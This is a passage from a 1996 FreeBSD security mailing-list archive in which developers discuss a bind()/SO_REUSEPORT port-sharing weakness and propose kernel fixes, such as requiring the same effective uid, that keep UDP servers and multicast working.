Although, it occurs to me... > > It should be possible to require that SO_REUSEPORT be specified on > both the original and the duplicate sockets. This way, those programs > (like ALL UDP-based servers) for which this is a requirement will > still be able to work with a minimum of modification. We can't, > however, require any modifications where multicast addresses are > involved. Correct, which is perfectly reasonable behavior. From owner-freebsd-security Wed Jan 31 17:00:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id RAA00606 for security-outgoing; Wed, 31 Jan 1996 17:00:28 -0800 (PST) Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id RAA00592 for ; Wed, 31 Jan 1996 17:00:23 -0800 (PST) Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <15742(13)>; Wed, 31 Jan 1996 16:59:48 PST Received: from localhost ([127.0.0.1]) by crevenia.parc.xerox.com with SMTP id <177479>; Wed, 31 Jan 1996 16:59:39 -0800 X-Mailer: exmh version 1.6.4 10/10/95 To: "Garrett A. Wollman" cc: Paul Traina , security@freebsd.org Subject: Re: [cisco.external.bugtraq] Re: BoS: bind() Security Problems In-reply-to: Your message of "Wed, 31 Jan 1996 11:30:09 PST." <9601311930.AA00772@halloran-eldar.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 31 Jan 1996 16:59:29 PST From: Bill Fenner Message-Id: <96Jan31.165939pst.177479@crevenia.parc.xerox.com> Sender: owner-security@freebsd.org Precedence: bulk In message <9601311930.AA00772@halloran-eldar.lcs.mit.edu> Garrett write: >It should be possible to require that SO_REUSEPORT be specified on >both the original and the duplicate sockets. In fact, Stevens says that those are already the semantics for SO_REUSEPORT. Bill From owner-freebsd-security Thu Feb 1 06:41:05 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id GAA00219 for security-outgoing; Thu, 1 Feb 1996 06:41:05 -0800 (PST) Received: from relay.philips.nl (ns.philips.nl [130.144.65.1]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id GAA00205 for ; Thu, 1 Feb 1996 06:40:59 -0800 (PST) Received: (from smap@localhost) by relay.philips.nl (8.6.9/8.6.9-950414) id PAA07234; Thu, 1 Feb 1996 15:40:13 +0100 Received: from unknown(192.26.173.32) by ns.philips.nl via smap (V1.3+ESMTP) with ESMTP id sma007149; Thu Feb 1 15:39:07 1996 Received: from spooky.lss.cp.philips.com (spooky.lss.cp.philips.com [130.144.199.105]) by smtp.nl.cis.philips.com (8.6.10/8.6.10-0.9z-02May95) with ESMTP id PAA29834; Thu, 1 Feb 1996 15:39:56 +0100 Received: (from guido@localhost) by spooky.lss.cp.philips.com (8.6.10/8.6.10-0.991c-08Nov95) id PAA18233; Thu, 1 Feb 1996 15:39:05 +0100 From: Guido van Rooij Message-Id: <199602011439.PAA18233@spooky.lss.cp.philips.com> Subject: Re: [cisco.external.bugtraq] Re: BoS: bind() Security Problems To: wollman@lcs.mit.edu (Garrett A. Wollman) Date: Thu, 1 Feb 1996 15:39:05 +0100 (MET) Cc: pst@cisco.com, security@freebsd.org In-Reply-To: <9601311930.AA00772@halloran-eldar.lcs.mit.edu> from "Garrett A. Wollman" at Jan 31, 96 02:30:09 pm Reply-To: Guido.vanRooij@nl.cis.philips.com (Guido van Rooij) X-Mailer: ELM [version 2.4 PL21] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org Precedence: bulk Garrett A. Wollman wrote: > > < said: > > > Yuck, I hate to think of what we're going to break when we fix this, but > > we should definitely fix this, otherwise users can hose NFS & friends. > > Lots of stuff will get broken. Although, it occurs to me... > > It should be possible to require that SO_REUSEPORT be specified on > both the original and the duplicate sockets. This way, those programs > (like ALL UDP-based servers) for which this is a requirement will > still be able to work with a minimum of modification. We can't, > however, require any modifications where multicast addresses are > involved. Wouldn't it be reasonable to require that the process trying to bind to an already used port has the same effective uid as the original binder? I think this can be checked via the socket that corresponds tothe pcb, via its pgid pointer. Of course indeed not in multicast mode. -Guido From owner-freebsd-security Thu Feb 1 12:28:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id MAA26508 for security-outgoing; Thu, 1 Feb 1996 12:28:03 -0800 (PST) Received: from precipice.shockwave.com (precipice.shockwave.com [171.69.108.33]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id MAA26474 for ; Thu, 1 Feb 1996 12:27:59 -0800 (PST) Received: from localhost.shockwave.com (localhost.shockwave.com [127.0.0.1]) by precipice.shockwave.com (8.7.3/8.7.3) with SMTP id MAA01487; Thu, 1 Feb 1996 12:27:14 -0800 (PST) Message-Id: <199602012027.MAA01487@precipice.shockwave.com> To: Guido.vanRooij@nl.cis.philips.com (Guido van Rooij) cc: wollman@lcs.mit.edu (Garrett A. Wollman), security@freebsd.org Subject: Re: [cisco.external.bugtraq] Re: BoS: bind() Security Problems In-reply-to: Your message of "Thu, 01 Feb 1996 15:39:05 +0100." <199602011439.PAA18233@spooky.lss.cp.philips.com> Date: Thu, 01 Feb 1996 12:27:14 -0800 From: Paul Traina Sender: owner-security@freebsd.org Precedence: bulk Yeah, that's what I was thinking to kludge around this for backwards compatibility. Paul From: Guido van Rooij Subject: Re: [cisco.external.bugtraq] Re: BoS: bind() Security Problems Garrett A. Wollman wrote: > > < said: > > > Yuck, I hate to think of what we're going to break when we fix this, but > > we should definitely fix this, otherwise users can hose NFS & friends. > > Lots of stuff will get broken. Although, it occurs to me... > > It should be possible to require that SO_REUSEPORT be specified on > both the original and the duplicate sockets. This way, those programs > (like ALL UDP-based servers) for which this is a requirement will > still be able to work with a minimum of modification. We can't, > however, require any modifications where multicast addresses are > involved. Wouldn't it be reasonable to require that the process trying to bind to an already used port has the same effective uid as the original binder? I think this can be checked via the socket that corresponds tothe pcb, via its pgid pointer. Of course indeed not in multicast mode. -Guido